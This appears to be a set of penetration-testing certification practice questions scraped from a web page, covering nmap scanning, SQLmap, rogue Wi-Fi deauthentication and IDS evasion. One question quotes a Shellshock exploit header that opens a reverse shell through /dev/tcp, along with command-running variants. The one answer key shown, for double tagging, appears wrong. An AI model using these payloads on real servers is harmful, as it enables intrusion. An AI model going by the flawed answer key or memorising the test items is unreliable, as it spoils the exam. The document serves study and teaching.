A penetration tester is attempting to discover live hosts on a subnet quickly.
Which of the following commands will perform a ping scan? A. nmap -sn 10.12.1.0/24 B. nmap -sV -A 10.12.1.0/24 C. nmap -Pn 10.12.1.0/24 D. nmap -sT -p- 10.12.1.0/24
A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987.
Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL? A. SQLmap B. Nessus C. Nikto D. DirBuster
A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables.
Which of the following should be included as a recommendation in the remediation report? A. Stronger algorithmic requirements B. Access controls on the server C. Encryption on the user passwords D. A patch management program
Which of the following protocols or technologies would in-transit confidentially protection for emailing the final security assessment report? A. S/MIME B. FTPS C. DNSSEC D. AS2
SIMULATION
You are a penetration tester running port scans on a server.
INSTRUCTIONS
Part 1: Given the output, construct the command that was used to generate this output from the available options
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
Correct Answer: See explanation below.
Explanation:
Explanation:
Part 1 Enter command: nmap 192.168.2.2 -sV -O
Part 2 Weak SMB file permissions
A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP.
Which of the following steps should the tester take NEXT? A. Send deauthentication frames to the stations. B. Perform jamming on all 2.4GHz and 5GHz channels. C. Set the malicious AP to broadcast within dynamic frequency selection channels. D. Modify the malicious AP configuration to not use a preshared key.
A penetration tester wants to scan a target network without being detected by the client's IDS.
Which of the following scans is MOST likely to avoid detection? A. nmap -P0 -T0 -sS 192.168.1.10 B. nmap -sA -sV –host-timeout 60 192.168.1.10 C. nmap -f –badsum 192.168.1.10 D. nmap -A -n 192.168.1.10
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations.
Which of the following are considered passive reconnaissance tools? (Choose two.) A. Wireshark B. Nessus C. Retina D. Burp Suite E. Shodan F. Nikto
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploit = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run? A. exploit = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"} B. exploit = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"} C. exploit = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} D. exploit = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1" "Accept": "text/html,application/xhtml+xml,application/xml"}
A penetration tester who is doing a company-requested assessment would like to send traffic to another system suing double tagging.
Which of the following techniques would BEST accomplish this goal? A. RFID cloning B. RFID tagging C. Meta tagging D. Tag nesting
Correct Answer: C
Please disable your adblocker or whitelist this site!
